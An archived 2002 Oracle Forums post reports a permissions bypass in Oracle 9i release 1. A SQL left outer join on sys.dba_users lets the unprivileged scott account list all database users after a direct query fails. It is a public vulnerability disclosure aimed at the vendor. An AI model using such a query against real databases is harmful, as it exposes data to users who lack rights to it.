Database Software

Announcement

For appeals, questions and feedback about Oracle Forums, please email oracle-forums-moderators_us@oracle.com. Technical questions should be asked in the appropriate category. Thank you!

Oracle 9i release 1 Security hole

163241Apr 25 2002

You all might be knowing that Oracle declares 9i as "UNBREAKABLE" ,Oracle declares that no body can break the security of Oracle 9i.
Yesterday night i was doing some DBA operations and assigning some permissions in Oracle9i release 1 database and found a serious security hole!!!!!!!!!!. Any database user can acces any table in database if he doesn't have permission ? I will show you how?

SQL> connect scott/tiger
;;; connected

SQL> select username from sys.dba_users
you will get an error that table or view doesn't exist

Now try this : (using a left outer join )

SQl> select a.username from sys.dba_users a left outer join sys.dba_users b
on a.usersname = b.username;

USERNAME
================================
SYS
SYSTEM
DBSNMP
AURORA$
SCOTT
RAJARM

and bla bla .....

Do something Oracle

Locked Post

New comments cannot be posted to this locked post.

Locked on May 24 2002

Added on Apr 25 2002

#database-security, #database-security-general

1 comment

428 views